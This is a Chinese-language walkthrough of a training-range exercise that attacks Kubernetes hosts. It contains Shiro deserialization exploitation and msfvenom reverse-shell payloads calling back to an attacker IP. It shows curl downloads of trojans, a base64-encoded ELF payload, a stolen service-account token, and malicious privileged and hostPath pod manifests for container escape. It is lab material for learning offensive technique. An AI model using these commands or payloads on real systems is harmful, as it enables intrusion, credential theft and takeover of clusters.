目录
第一题:
题目描述:
fscan扫描主机:
发现30200端口存在shrio反序列化漏洞,key为kPH+bIxk5D2deZiIxcaaaA==
利用工具尝试攻击:
命令执行:
拿到题目要求md5值:55d10e753491f79b83723ad44b17b32d。
第二题:
由于靶机实现了均衡负载,故利用msf建立稳定的连接。
制作Linux木马,ip设为vpn的ip(靶机是内网IP,要使用实训给的vpn才能登上)
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.194.108 LPORT=4446 -f elf > linux.elf
msfconsole设置并开启监听:
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.194.108
set lport 4446
run
利用python开启一个共享文件夹,用于让靶机下载木马:
python -m http.server 8090
测试靶机能否curl访问木马文件内容:
靶机curl访问木马内容并在tmp目录下保存为linux.elf文件:
curl http://192.168.194.108:8090/linux.elf -o linux.elf
授予文件权限:
执行木马上线msf:
在msf进入shell,在tmp目录下下载工具kubectl(已将kubectl文件放入共享文件夹):
shell
cd /tmp
ls
curl http://192.168.194.108:8090/kubectl -o ./kubectl
可以看到下载完成:
授予下载好的kubectl可执行权限:
当前已获得权限的pod是被配置了高权限的serviceAccount,故能pod能进行逃逸。
获取token:
cat /var/run/secrets/kubernetes.io/serviceaccount/token
通过环境变量,查看api-server服务器的ip地址为10.4.3.0.1(在msf的shell中不知道为什么看不到):
利用kubectl工具用获取的token查看pods:
./kubectl --server=https://10.43.0.1 --token=eyJhbGciOiJSUzI1NiIsImtpZCI6Ik5TaU9rb05yRG1lZ2lZUm1uUks5cU9xczJPM2ZyZEh2ZmdBUDdER3JOXzAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoyMDM2NjU2MDAwLCJpYXQiOjE3MjEyOTYwMDAsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJnYW1lLWFwcCIsInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJnYW1lLWFkbWluIiwidWlkIjoiMTY1OGUxMWYtZTNkOS00MzQ2LWI0NGItODdiY2VmYzE4OTc1In19LCJuYmYiOjE3MjEyOTYwMDAsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpnYW1lLWFwcDpnYW1lLWFkbWluIn0.FCisEc7Ajr5rcExD8OWBnKrdcl52k9MjlJMM1WqqTJBBreSdTTHrUga7NQCpj_tSWc58IsmYIdRTrjwoD6ToTKofjzoaoHEe0Egtman3n5T7Y7A_JVt0tM5LrUuzTeBGc8WDrukqSMmBMrFD-KtouuHWFk9e2LOK4pIr5Ao1948p9mxC5cDgDd5TqRT9iN0DYy0FhS4H32256K1_0kXv-IpkiL5GzzTp2TjidSPrjFta06DveCDOYRBgLhp7-UBr1IJsL0_P5LgGN1lpiA5Kvv5OjouextQYKhiSgTfRD1LZgccNoQQowRDFPGmVbmmKa-CyoN2OyuyMw1Izn_0wiA --insecure-skip-tls-verify=true get pods -A
--server指定的是api-server的ip地址(env可以看到),token是cat /var/run/secrets/kubernetes.io/serviceaccount/token获得的凭证
构造一个恶意pod配置文件,该恶意pod可以将pod宿主机根目录挂载到恶意pod下的mnt目录,从而可以访问到宿主机根目录下的flag。
恶意pod配置文件:
#用于逃逸到当前的pod所在的node节点主机
apiVersion: v1
kind: Pod
metadata:
name: test
spec:
containers:
- image: nginx
name: test-container
volumeMounts:
- mountPath: /mnt
name: test-volume
volumes:
- name: test-volume
hostPath:
将该配置文件放到共享文件夹,在pod上用curl下载到tmp目录下:
利用kubectl工具启动这个恶意pod:
./kubectl --server=https://10.43.0.1 --token=eyJhbGciOiJSUzI1NiIsImtpZCI6Ik5TaU9rb05yRG1lZ2lZUm1uUks5cU9xczJPM2ZyZEh2ZmdBUDdER3JOXzAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoyMDM2NjU2MDAwLCJpYXQiOjE3MjEyOTYwMDAsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJnYW1lLWFwcCIsInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJnYW1lLWFkbWluIiwidWlkIjoiMTY1OGUxMWYtZTNkOS00MzQ2LWI0NGItODdiY2VmYzE4OTc1In19LCJuYmYiOjE3MjEyOTYwMDAsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpnYW1lLWFwcDpnYW1lLWFkbWluIn0.FCisEc7Ajr5rcExD8OWBnKrdcl52k9MjlJMM1WqqTJBBreSdTTHrUga7NQCpj_tSWc58IsmYIdRTrjwoD6ToTKofjzoaoHEe0Egtman3n5T7Y7A_JVt0tM5LrUuzTeBGc8WDrukqSMmBMrFD-KtouuHWFk9e2LOK4pIr5Ao1948p9mxC5cDgDd5TqRT9iN0DYy0FhS4H32256K1_0kXv-IpkiL5GzzTp2TjidSPrjFta06DveCDOYRBgLhp7-UBr1IJsL0_P5LgGN1lpiA5Kvv5OjouextQYKhiSgTfRD1LZgccNoQQowRDFPGmVbmmKa-CyoN2OyuyMw1Izn_0wiA --insecure-skip-tls-verify=true apply -f ./a.yaml
等待pod启动:
可以看到创建的名字为test这个pod成功启动。
进入test:
./kubectl --server=https://10.43.0.1 --token=eyJhbGciOiJSUzI1NiIsImtpZCI6Ik5TaU9rb05yRG1lZ2lZUm1uUks5cU9xczJPM2ZyZEh2ZmdBUDdER3JOXzAifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiLCJrM3MiXSwiZXhwIjoyMDM2NjU2MDAwLCJpYXQiOjE3MjEyOTYwMDAsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJnYW1lLWFwcCIsInNlcnZpY2VhY2NvdW50Ijp7Im5hbWUiOiJnYW1lLWFkbWluIiwidWlkIjoiMTY1OGUxMWYtZTNkOS00MzQ2LWI0NGItODdiY2VmYzE4OTc1In19LCJuYmYiOjE3MjEyOTYwMDAsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpnYW1lLWFwcDpnYW1lLWFkbWluIn0.FCisEc7Ajr5rcExD8OWBnKrdcl52k9MjlJMM1WqqTJBBreSdTTHrUga7NQCpj_tSWc58IsmYIdRTrjwoD6ToTKofjzoaoHEe0Egtman3n5T7Y7A_JVt0tM5LrUuzTeBGc8WDrukqSMmBMrFD-KtouuHWFk9e2LOK4pIr5Ao1948p9mxC5cDgDd5TqRT9iN0DYy0FhS4H32256K1_0kXv-IpkiL5GzzTp2TjidSPrjFta06DveCDOYRBgLhp7-UBr1IJsL0_P5LgGN1lpiA5Kvv5OjouextQYKhiSgTfRD1LZgccNoQQowRDFPGmVbmmKa-CyoN2OyuyMw1Izn_0wiA --insecure-skip-tls-verify=true exec -it test -- /bin/sh
查看mnt下是否成功挂载了宿主机的根目录:
成功挂载,获取root下的flag:
第六题
利用fscan扫描靶机:
在对扫描出来的各个端口进行目录扫描的时候发现在10000端口.git文件泄漏:
利用GitHack工具下载源码:
进入保存源码的目录,搜索secretKey关键字:
发现在demo.html文件下,密钥为:PddmV2P2hNwBkTKBejAD8ni8vsh2JcHF
查看demo.html:
发现acessKey和secretKey:
第四题
通过访问fscan扫出的端口,发现minio的后台登录端口为靶机的9000:
利用demo.html中的密钥登录:
下载下来mysql.yaml文件:
mysql的密码就在里面,为CoreMysql@36
第五题
第四题知道了mysql的密码,利用MDUT工具连接数据库进行udf提取:
由于连上的数据库服务器没有curl,也没有wget命令,故采用echo+base64编码的方式写入Linux木马建立稳定的msf连接。
msfconsole设置并开启监听:
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.194.108
set lport 4446
run
生成linux木马内容的base64编码:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.194.108 LPORT=4446 -f elf |base64
将生成的base64字符串去掉换行
写入文件:
echo "f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXsCowmxRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==" |base64 -d > pay.elf
给文件增加执行权限并执行:
chmod +x ./pay.elf;./pay.elf
成功上线:
查看环境变量:
发现api-server的IP地址为172.17.0.1
上传fscan:
在msf中进入shell,给fscan执行权限后,利用fscan扫描172.17.0.1:
发现api-server未授权访问漏洞。
exit退出shell:
上传kubectl工具对漏洞进行利用:
再次进入shell:
给kubectl增加执行权限:
进行漏洞利用,查看pods:
script -a -c bash -f /dev/null
/tmp/kubectl --server=https://172.17.0.1/ --insecure-skip-tls-verify=true get pods
由于未授权漏洞,用户名和密码随便输入就行。(script -a -c bash -f /dev/null不知道干什么的,但没有这条命令会失败不知道为什么)
接下来构造恶意pod,该pod能够将k8s-master的根目录挂载到pod的/host文件夹下。
构造恶意pod文件:
#设置污点容忍度+nodeSelector从而逃逸到master节点上
apiVersion: v1
kind: Pod
metadata:
name: k8s-master2
spec:
hostNetwork: true
nodeName: k8s-master
containers:
- name: alpha
image: docker.io/flannel/flannel:v0.21.4
command: ["/sbin/init"]
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: hostvolume
tolerations:
- key: node-role.kubernetes.io/master #master节点默认污点
operator: Exists
effect: NoSchedule
volumes:
- name: hostvolume
hostPath:
path: /
type: Directory
将以上内容保存到xx.yaml文件中,并上传到靶机的/tmp下:
进入shell后,创建恶意pod:
查看pods
发现已经恶意pod k8s-master2已经成功启动
进入恶意pod k8s-master2:
/tmp/kubectl --server=https://172.17.0.1/ --insecure-skip-tls-verify=true exec -it k8s-master2 -- /bin/sh
查看/host是否成功挂载master的根目录:
虽然是乱码但是确实有,说明挂载成功。
将shell的根目录变成/host:
成功进入到master的根目录,查看根目录:
查看proof文件内容:
proof文件内容为67bae080cee3e75f8b9b8b2a00d21892
至此,练习结束。